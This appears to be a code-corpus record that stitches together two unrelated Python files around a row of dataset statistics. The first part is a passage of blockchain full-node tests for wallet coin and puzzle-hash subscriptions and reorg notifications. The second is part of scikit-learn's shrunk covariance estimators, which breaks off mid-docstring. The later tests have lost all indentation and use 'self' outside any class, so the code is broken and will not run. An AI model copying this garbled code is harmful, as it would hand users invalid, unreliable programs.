        tx_record = await wallet.generate_signed_transaction(uint64(10), junk_ph, uint64(0))
        await wallet.push_transaction(tx_record)
        await time_out_assert(
            15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
        )
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        # The coin spent above must have been pushed with a spent_height set.
        all_messages = await self.get_all_messages_in_queue(incoming_queue)
        notified_state = None
        for message in all_messages:
            if message.type == ProtocolMessageTypes.coin_state_update.value:
                data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
                for coin_state in data_response.items:
                    if coin_state.coin.name() == spent_coin.name():
                        notified_state = coin_state
        assert notified_state is not None
        assert notified_state.coin == spent_coin
        assert notified_state.spent_height is not None
    @pytest.mark.asyncio
    async def test_subscribe_for_coin_id(self, wallet_node_simulator, self_hostname):
        """End-to-end check of coin-id subscriptions (RegisterForCoinUpdates):
        subscribing to an existing coin returns its state immediately,
        spending it pushes a CoinStateUpdate with spent_height set, and
        subscribing to a not-yet-created coin id returns nothing until the
        coin is created, at which point an unspent state is pushed.
        """
        num_blocks = 4
        full_nodes, wallets = wallet_node_simulator
        full_node_api = full_nodes[0]
        wallet_node, server_2 = wallets[0]
        fn_server = full_node_api.full_node.server
        wsm: WalletStateManager = wallet_node.wallet_state_manager
        standard_wallet: Wallet = wsm.wallets[1]
        puzzle_hash = await standard_wallet.get_new_puzzlehash()
        await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
        # A dummy connection lets us inspect the raw pushed protocol messages.
        incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
        fake_wallet_peer = fn_server.all_connections[peer_id]
        # Farm to create a coin that we'll track
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        funds = sum(
            [calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i)) for i in range(1, num_blocks)]
        )
        await time_out_assert(15, standard_wallet.get_confirmed_balance, funds)
        my_coins: List[CoinRecord] = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(
            True, puzzle_hash
        )
        coin_to_spend = my_coins[0].coin
        # Subscribing to an existing coin returns its current state right away.
        msg = wallet_protocol.RegisterForCoinUpdates([coin_to_spend.name()], 0)
        msg_response = await full_node_api.register_interest_in_coin(msg, fake_wallet_peer)
        assert msg_response is not None
        assert msg_response.type == ProtocolMessageTypes.respond_to_coin_update.value
        data_response: RespondToCoinUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
        assert data_response.coin_states[0].coin == coin_to_spend
        # Spend exactly the subscribed coin.
        coins = set()
        coins.add(coin_to_spend)
        tx_record = await standard_wallet.generate_signed_transaction(uint64(10), puzzle_hash, uint64(0), coins=coins)
        await standard_wallet.push_transaction(tx_record)
        await time_out_assert(
            15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
        )
        # Farm transaction
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        # Only the subscribed coin should have been pushed, and as spent.
        all_messages = await self.get_all_messages_in_queue(incoming_queue)
        notified_coins = set()
        for message in all_messages:
            if message.type == ProtocolMessageTypes.coin_state_update.value:
                data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
                for coin_state in data_response.items:
                    notified_coins.add(coin_state.coin)
                    assert coin_state.spent_height is not None
        assert notified_coins == coins
        # Test getting notification for coin that is about to be created
        await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
        tx_record = await standard_wallet.generate_signed_transaction(uint64(10), puzzle_hash, uint64(0))
        tx_record.spend_bundle.additions()
        # Pick the to-be-created output coin paying back to our puzzle hash.
        added_target: Optional[Coin] = None
        for coin in tx_record.spend_bundle.additions():
            if coin.puzzle_hash == puzzle_hash:
                added_target = coin
        assert added_target is not None
        # Subscribing before the coin exists must return an empty state list.
        msg = wallet_protocol.RegisterForCoinUpdates([added_target.name()], 0)
        msg_response = await full_node_api.register_interest_in_coin(msg, fake_wallet_peer)
        assert msg_response is not None
        assert msg_response.type == ProtocolMessageTypes.respond_to_coin_update.value
        data_response: RespondToCoinUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
        assert len(data_response.coin_states) == 0
        await standard_wallet.push_transaction(tx_record)
        await time_out_assert(
            15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
        )
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        # Once created, the coin is pushed with no spent_height.
        all_messages = await self.get_all_messages_in_queue(incoming_queue)
        notified_state = None
        for message in all_messages:
            if message.type == ProtocolMessageTypes.coin_state_update.value:
                data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
                for coin_state in data_response.items:
                    if coin_state.coin.name() == added_target.name():
                        notified_state = coin_state
        assert notified_state is not None
        assert notified_state.coin == added_target
        assert notified_state.spent_height is None
    @pytest.mark.asyncio
    async def test_subscribe_for_ph_reorg(self, wallet_node_simulator, self_hostname):
        """A reorg that orphans coins on a subscribed puzzle hash must push a
        second CoinStateUpdate: the first update reports the coins' creation,
        the second (with fork_height set) reports them gone — neither created
        nor spent on the new chain.
        """
        num_blocks = 4
        long_blocks = 20
        full_nodes, wallets = wallet_node_simulator
        full_node_api = full_nodes[0]
        wallet_node, server_2 = wallets[0]
        fn_server = full_node_api.full_node.server
        wsm: WalletStateManager = wallet_node.wallet_state_manager
        standard_wallet: Wallet = wsm.wallets[1]
        puzzle_hash = await standard_wallet.get_new_puzzlehash()
        await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
        # A dummy connection lets us inspect the raw pushed protocol messages.
        incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
        fake_wallet_peer = fn_server.all_connections[peer_id]
        zero_ph = 32 * b"\0"
        # Farm to create a coin that we'll track
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        for i in range(0, long_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        # Subscribe first, then farm one block paying to the watched hash.
        msg = wallet_protocol.RegisterForPhUpdates([puzzle_hash], 0)
        msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
        assert msg_response is not None
        await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        expected_height = uint32(long_blocks + 2 * num_blocks + 1)
        await time_out_assert(15, full_node_api.full_node.blockchain.get_peak_height, expected_height)
        coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
        assert len(coin_records) > 0
        # Reorg back to before the watched coins were created; the new chain
        # pays everything to zero_ph, so the watched coins vanish.
        fork_height = expected_height - num_blocks - 5
        req = ReorgProtocol(fork_height, expected_height + 5, zero_ph)
        await full_node_api.reorg_from_index_to_new_index(req)
        coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
        assert coin_records == []
        all_messages = await self.get_all_messages_in_queue(incoming_queue)
        coin_update_messages = []
        for message in all_messages:
            if message.type == ProtocolMessageTypes.coin_state_update.value:
                data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
                coin_update_messages.append(data_response)
        # First state is creation, second one is a reorg
        assert len(coin_update_messages) == 2
        first = coin_update_messages[0]
        assert len(first.items) == 2
        first_state_coin_1 = first.items[0]
        assert first_state_coin_1.spent_height is None
        assert first_state_coin_1.created_height is not None
        first_state_coin_2 = first.items[1]
        assert first_state_coin_2.spent_height is None
        assert first_state_coin_2.created_height is not None
        # After the reorg both coins are reported with no creation height.
        second = coin_update_messages[1]
        assert second.fork_height == fork_height
        assert len(second.items) == 2
        second_state_coin_1 = second.items[0]
        assert second_state_coin_1.spent_height is None
        assert second_state_coin_1.created_height is None
        second_state_coin_2 = second.items[1]
        assert second_state_coin_2.spent_height is None
        assert second_state_coin_2.created_height is None
    @pytest.mark.asyncio
    async def test_subscribe_for_coin_id_reorg(self, wallet_node_simulator, self_hostname):
        """A reorg that orphans coins subscribed to BY COIN ID must push a
        single CoinStateUpdate reporting both coins as neither created nor
        spent on the new chain (subscription happens after creation here, so
        there is no earlier creation push).
        """
        num_blocks = 4
        long_blocks = 20
        full_nodes, wallets = wallet_node_simulator
        full_node_api = full_nodes[0]
        wallet_node, server_2 = wallets[0]
        fn_server = full_node_api.full_node.server
        wsm: WalletStateManager = wallet_node.wallet_state_manager
        standard_wallet: Wallet = wsm.wallets[1]
        puzzle_hash = await standard_wallet.get_new_puzzlehash()
        await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
        # A dummy connection lets us inspect the raw pushed protocol messages.
        incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
        fake_wallet_peer = fn_server.all_connections[peer_id]
        zero_ph = 32 * b"\0"
        # Farm to create a coin that we'll track
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        for i in range(0, long_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
        for i in range(0, num_blocks):
            await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
        expected_height = uint32(long_blocks + 2 * num_blocks + 1)
        await time_out_assert(15, full_node_api.full_node.blockchain.get_peak_height, expected_height)
        coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
        assert len(coin_records) > 0
        # Subscribe to each existing coin individually, by id.
        for coin_rec in coin_records:
            msg = wallet_protocol.RegisterForCoinUpdates([coin_rec.name], 0)
            msg_response = await full_node_api.register_interest_in_coin(msg, fake_wallet_peer)
            assert msg_response is not None
        # Reorg back to before the watched coins were created.
        fork_height = expected_height - num_blocks - 5
        req = ReorgProtocol(fork_height, expected_height + 5, zero_ph)
        await full_node_api.reorg_from_index_to_new_index(req)
        coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
        assert coin_records == []
        all_messages = await self.get_all_messages_in_queue(incoming_queue)
        coin_update_messages = []
        for message in all_messages:
            if message.type == ProtocolMessageTypes.coin_state_update.value:
                data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
                coin_update_messages.append(data_response)
        # Single update carrying both orphaned coins with no heights set.
        assert len(coin_update_messages) == 1
        update = coin_update_messages[0]
        coin_states = update.items
        assert len(coin_states) == 2
        first_coin = coin_states[0]
        assert first_coin.spent_height is None
        assert first_coin.created_height is None
        second_coin = coin_states[1]
        assert second_coin.spent_height is None
        assert second_coin.created_height is None
@pytest.mark.asyncio
async def test_subscribe_for_hint(self, bt, wallet_node_simulator, self_hostname):
num_blocks = 4
full_nodes, wallets = wallet_node_simulator
full_node_api = full_nodes[0]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
wt: WalletTool = bt.get_pool_wallet_tool()
ph = wt.get_new_puzzlehash()
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
await asyncio.sleep(6)
coins = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hashes(False, [ph])
coin_spent = coins[0].coin
hint_puzzle_hash = 32 * b"\2"
amount = 1
amount_bin = int_to_bytes(1)
hint = 32 * b"\5"
fake_wallet_peer = fn_server.all_connections[peer_id]
msg = wallet_protocol.RegisterForPhUpdates([hint], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 0
condition_dict = {
ConditionOpcode.CREATE_COIN: [
ConditionWithArgs(ConditionOpcode.CREATE_COIN, [hint_puzzle_hash, amount_bin, hint])
]
}
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
tx: SpendBundle = wt.generate_signed_transaction(
10,
wt.get_new_puzzlehash(),
coin_spent,
condition_dic=condition_dict,
)
await full_node_api.respond_transaction(RespondTransaction(tx), fake_wallet_peer)
await time_out_assert(15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx.name())
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
all_messages = await self.get_all_messages_in_queue(incoming_queue)
notified_state = None
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
notified_state = data_response
break
assert notified_state is not None
assert notified_state.items[0].coin == Coin(coin_spent.name(), hint_puzzle_hash, amount)
msg = wallet_protocol.RegisterForPhUpdates([hint], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 1
coin_records: List[CoinRecord] = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(
True, hint_puzzle_hash
)
assert len(coin_records) == 1
assert data_response.coin_states[0] == coin_records[0].coin_state
@pytest.mark.asyncio
async def test_subscribe_for_hint_long_sync(self, wallet_two_node_simulator, bt, self_hostname):
num_blocks = 4
full_nodes, wallets = wallet_two_node_simulator
full_node_api = full_nodes[0]
full_node_api_1 = full_nodes[1]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
fn_server_1 = full_node_api_1.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
incoming_queue_1, peer_id_1 = await add_dummy_connection(fn_server_1, self_hostname, 12313, NodeType.WALLET)
wt: WalletTool = bt.get_pool_wallet_tool()
ph = wt.get_new_puzzlehash()
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
await asyncio.sleep(6)
coins = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hashes(False, [ph])
coin_spent = coins[0].coin
hint_puzzle_hash = 32 * b"\2"
amount = 1
amount_bin = int_to_bytes(1)
hint = 32 * b"\5"
fake_wallet_peer = fn_server.all_connections[peer_id]
fake_wallet_peer_1 = fn_server_1.all_connections[peer_id_1]
msg = wallet_protocol.RegisterForPhUpdates([hint], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
msg_response_1 = await full_node_api_1.register_interest_in_puzzle_hash(msg, fake_wallet_peer_1)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 0
condition_dict = {
ConditionOpcode.CREATE_COIN: [
ConditionWithArgs(ConditionOpcode.CREATE_COIN, [hint_puzzle_hash, amount_bin, hint])
]
}
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
tx: SpendBundle = wt.generate_signed_transaction(
10,
wt.get_new_puzzlehash(),
coin_spent,
condition_dic=condition_dict,
)
await full_node_api.respond_transaction(RespondTransaction(tx), fake_wallet_peer)
await time_out_assert(15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx.name())
# Create more blocks than recent "short_sync_blocks_behind_threshold" so that node enters batch
for i in range(0, 100):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
node1_height = full_node_api_1.full_node.blockchain.get_peak_height()
assert node1_height is None
await fn_server_1.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
node0_height = full_node_api.full_node.blockchain.get_peak_height()
await time_out_assert(15, full_node_api_1.full_node.blockchain.get_peak_height, node0_height)
all_messages = await self.get_all_messages_in_queue(incoming_queue)
all_messages_1 = await self.get_all_messages_in_queue(incoming_queue_1)
def check_messages_for_hint(messages):
notified_state = None
for message in messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
notified_state = data_response
break
assert notified_state is not None
assert notified_state.items[0].coin == Coin(coin_spent.name(), hint_puzzle_hash, amount)
check_messages_for_hint(all_messages)
check_messages_for_hint(all_messages_1)
| 46.052632 | 118 | 0.712555 | 4,032 | 30,625 | 5.024058 | 0.067708 | 0.05055 | 0.051044 | 0.048181 | 0.837291 | 0.801994 | 0.77973 | 0.774004 | 0.750407 | 0.731747 | 0 | 0.014943 | 0.219886 | 30,625 | 664 | 119 | 46.121988 | 0.83295 | 0.024163 | 0 | 0.614481 | 0 | 0 | 0.001373 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 1 | 0.005871 | false | 0 | 0.056751 | 0 | 0.07045 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0acb00d98681d6db1f2d6eb04777d57c01d09d8d | 17,960 | py | Python | python/sklearn/sklearn/covariance/shrunk_covariance_.py | seckcoder/lang-learn | 1e0d6f412bbd7f89b1af00293fd907ddb3c1b571 | [
"Unlicense"
] | 1 | 2017-10-14T04:23:45.000Z | 2017-10-14T04:23:45.000Z | python/sklearn/sklearn/covariance/shrunk_covariance_.py | seckcoder/lang-learn | 1e0d6f412bbd7f89b1af00293fd907ddb3c1b571 | [
"Unlicense"
] | null | null | null | python/sklearn/sklearn/covariance/shrunk_covariance_.py | seckcoder/lang-learn | 1e0d6f412bbd7f89b1af00293fd907ddb3c1b571 | [
"Unlicense"
] | null | null | null | """
Covariance estimators using shrinkage.
Shrinkage corresponds to regularising `cov` using a convex combination:
shrunk_cov = (1-shrinkage)*cov + shrinkage*structured_estimate.
"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD Style.
# avoid division truncation
from __future__ import division
import warnings
import numpy as np
from .empirical_covariance_ import empirical_covariance, EmpiricalCovariance
from ..utils import array2d
###############################################################################
# ShrunkCovariance estimator
def shrunk_covariance(emp_cov, shrinkage=0.1):
"""Calculates a covariance matrix shrunk on the diagonal
Parameters
----------
emp_cov: array-like, shape (n_features, n_features)
Covariance matrix to be shrunk
shrinkage: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Returns
-------
shrunk_cov: array-like
shrunk covariance
Notes
-----
The regularized (shrunk) covariance is given by
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
"""
emp_cov = array2d(emp_cov)
n_features = emp_cov.shape[0]
mu = np.trace(emp_cov) / n_features
shrunk_cov = (1. - shrinkage) * emp_cov
shrunk_cov.flat[::n_features + 1] += shrinkage * mu
return shrunk_cov
class ShrunkCovariance(EmpiricalCovariance):
"""Covariance estimator with shrinkage
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored
shrinkage: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Attributes
----------
`covariance_` : array-like, shape (n_features, n_features)
Estimated covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`shrinkage`: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularized covariance is given by
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
"""
def __init__(self, store_precision=True, assume_centered=False,
shrinkage=0.1):
EmpiricalCovariance.__init__(self, store_precision=store_precision,
assume_centered=assume_centered)
self.shrinkage = shrinkage
def fit(self, X, y=None):
""" Fits the shrunk covariance model
according to the given training data and parameters.
Parameters
----------
X: array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y: not used, present for API consistence purpose.
assume_centered: Boolean
If True, data are not centered before computation.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
Returns
-------
self: object
Returns self.
"""
# Not calling the parent object to fit, to avoid a potential
# matrix inversion when setting the precision
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance = empirical_covariance(X,
assume_centered=self.assume_centered)
covariance = shrunk_covariance(covariance, self.shrinkage)
self._set_covariance(covariance)
return self
###############################################################################
# Ledoit-Wolf estimator
def ledoit_wolf_shrinkage(X, assume_centered=False, block_size=1000):
"""Estimates the shrunk Ledoit-Wolf covariance matrix.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Data from which to compute the Ledoit-Wolf shrunk covariance shrinkage
assume_centered: Boolean
If True, data are not centered before computation.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
block_size: int,
Size of the blocks into which the covariance matrix will be split.
Returns
-------
shrinkage: float
Coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularized (shrunk) covariance is:
(1 - shrinkage)*cov
+ shrinkage * mu * np.identity(n_features)
where mu = trace(cov) / n_features
"""
X = np.asarray(X)
# for only one feature, the result is the same whatever the shrinkage
if len(X.shape) == 2 and X.shape[1] == 1:
return 0.
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. " \
"You may want to reshape your data array")
n_samples = 1
n_features = X.size
else:
n_samples, n_features = X.shape
# optionaly center data
if not assume_centered:
X = X - X.mean(0)
# number of blocks to split the covariance matrix into
n_splits = int(n_features / block_size)
X2 = X ** 2
emp_cov_trace = np.sum(X2, axis=0) / n_samples
mu = np.sum(emp_cov_trace) / n_features
beta_ = 0. # sum of the coefficients of <X2.T, X2>
delta_ = 0. # sum of the *squared* coefficients of <X.T, X>
# starting block computation
for i in xrange(n_splits):
for j in xrange(n_splits):
rows = slice(block_size * i, block_size * (i + 1))
cols = slice(block_size * j, block_size * (j + 1))
beta_ += np.sum(np.dot(X2.T[rows], X2[:, cols]))
delta_ += np.sum(np.dot(X.T[rows], X[:, cols]) ** 2)
rows = slice(block_size * i, block_size * (i + 1))
beta_ += np.sum(np.dot(X2.T[rows], X2[:, block_size * n_splits:]))
delta_ += np.sum(
np.dot(X.T[rows], X[:, block_size * n_splits:]) ** 2)
for j in xrange(n_splits):
cols = slice(block_size * j, block_size * (j + 1))
beta_ += np.sum(np.dot(X2.T[block_size * n_splits:], X2[:, cols]))
delta_ += np.sum(
np.dot(X.T[block_size * n_splits:], X[:, cols]) ** 2)
delta_ += np.sum(np.dot(X.T[block_size * n_splits:],
X[:, block_size * n_splits:]) ** 2)
delta_ /= n_samples ** 2
beta_ += np.sum(np.dot(
X2.T[block_size * n_splits:], X2[:, block_size * n_splits:]))
# use delta_ to compute beta
beta = 1. / (n_features * n_samples) * (beta_ / n_samples - delta_)
# delta is the sum of the squared coefficients of (<X.T,X> - mu*Id) / p
delta = delta_ - 2. * mu * emp_cov_trace.sum() + n_features * mu ** 2
delta /= n_features
# get final beta as the min between beta and delta
beta = min(beta, delta)
# finally get shrinkage
shrinkage = beta / delta
return shrinkage
def ledoit_wolf(X, assume_centered=False, block_size=1000):
"""Estimates the shrunk Ledoit-Wolf covariance matrix.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Data from which to compute the covariance estimate
assume_centered: Boolean
If True, data are not centered before computation.
Usefull to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
block_size: int,
Size of the blocks into which the covariance matrix will be split.
If n_features > `block_size`, an error will be raised since the
shrunk covariance matrix will be considered as too large regarding
the available memory.
Returns
-------
shrunk_cov: array-like, shape (n_features, n_features)
Shrunk covariance.
shrinkage: float
Coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularized (shrunk) covariance is:
(1 - shrinkage)*cov
+ shrinkage * mu * np.identity(n_features)
where mu = trace(cov) / n_features
"""
X = np.asarray(X)
# for only one feature, the result is the same whatever the shrinkage
if len(X.shape) == 2 and X.shape[1] == 1:
if not assume_centered:
X = X - X.mean()
return np.atleast_2d((X ** 2).mean()), 0.
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. " \
"You may want to reshape your data array")
n_samples = 1
n_features = X.size
else:
n_samples, n_features = X.shape
if n_features > block_size:
raise MemoryError("LW: n_features is too large, " +
"try increasing block_size")
# get Ledoit-Wolf shrinkage
shrinkage = ledoit_wolf_shrinkage(
X, assume_centered=assume_centered, block_size=block_size)
emp_cov = empirical_covariance(X, assume_centered=assume_centered)
mu = np.sum(np.trace(emp_cov)) / n_features
shrunk_cov = (1. - shrinkage) * emp_cov
shrunk_cov.flat[::n_features + 1] += shrinkage * mu
return shrunk_cov, shrinkage
class LedoitWolf(EmpiricalCovariance):
"""LedoitWolf Estimator
Ledoit-Wolf is a particular form of shrinkage, where the shrinkage
coefficient is computed using O. Ledoit and M. Wolf's formula as
described in "A Well-Conditioned Estimator for Large-Dimensional
Covariance Matrices", Ledoit and Wolf, Journal of Multivariate
Analysis, Volume 88, Issue 2, February 2004, pages 365-411.
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored
assume_centered: bool
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False (default), data are centered before computation.
block_size: int,
Size of the blocks into which the covariance matrix will be split
during its Ledoit-Wolf estimation.
If n_features > `block_size`, an error will be raised since the
shrunk covariance matrix will be considered as too large regarding
the available memory.
Attributes
----------
`covariance_` : array-like, shape (n_features, n_features)
Estimated covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`shrinkage_`: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularised covariance is::
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
and shinkage is given by the Ledoit and Wolf formula (see References)
References
----------
"A Well-Conditioned Estimator for Large-Dimensional Covariance Matrices",
Ledoit and Wolf, Journal of Multivariate Analysis, Volume 88, Issue 2,
February 2004, pages 365-411.
"""
def __init__(self, store_precision=True, assume_centered=False,
block_size=1000):
EmpiricalCovariance.__init__(self, store_precision=store_precision,
assume_centered=assume_centered)
self.block_size = block_size
def fit(self, X, y=None):
""" Fits the Ledoit-Wolf shrunk covariance model
according to the given training data and parameters.
Parameters
----------
X: array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y: not used, present for API consistence purpose.
Returns
-------
self: object
Returns self.
"""
# Not calling the parent object to fit, to avoid computing the
# covariance matrix (and potentially the precision)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance, shrinkage = ledoit_wolf(X - self.location_,
assume_centered=True, block_size=self.block_size)
self.shrinkage_ = shrinkage
self._set_covariance(covariance)
return self
###############################################################################
# OAS estimator
def oas(X, assume_centered=False):
"""Estimate covariance with the Oracle Approximating Shrinkage algorithm.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Data from which to compute the covariance estimate
assume_centered: boolean
If True, data are not centered before computation.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, data are centered before computation.
Returns
-------
shrunk_cov: array-like, shape (n_features, n_features)
Shrunk covariance
shrinkage: float
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularised (shrunk) covariance is:
(1 - shrinkage)*cov
+ shrinkage * mu * np.identity(n_features)
where mu = trace(cov) / n_features
The formula we used to implement the OAS
does not correspond to the one given in the article. It has been taken
from the MATLAB program available from the author's webpage
(https://tbayes.eecs.umich.edu/yilun/covestimation).
"""
X = np.asarray(X)
# for only one feature, the result is the same whatever the shrinkage
if len(X.shape) == 2 and X.shape[1] == 1:
if not assume_centered:
X = X - X.mean()
return np.atleast_2d((X ** 2).mean()), 0.
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. " \
"You may want to reshape your data array")
n_samples = 1
n_features = X.size
else:
n_samples, n_features = X.shape
emp_cov = empirical_covariance(X, assume_centered=assume_centered)
mu = np.trace(emp_cov) / n_features
# formula from Chen et al.'s **implementation**
alpha = np.mean(emp_cov ** 2)
num = alpha + mu ** 2
den = (n_samples + 1.) * (alpha - (mu ** 2) / n_features)
shrinkage = min(num / den, 1.)
shrunk_cov = (1. - shrinkage) * emp_cov
shrunk_cov.flat[::n_features + 1] += shrinkage * mu
return shrunk_cov, shrinkage
class OAS(EmpiricalCovariance):
"""
Oracle Approximating Shrinkage Estimator
OAS is a particular form of shrinkage described in
"Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
The formula used here does not correspond to the one given in the
article. It has been taken from the Matlab program available from the
authors' webpage (https://tbayes.eecs.umich.edu/yilun/covestimation).
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored.
assume_centered: bool
If True, data are not centered before computation.
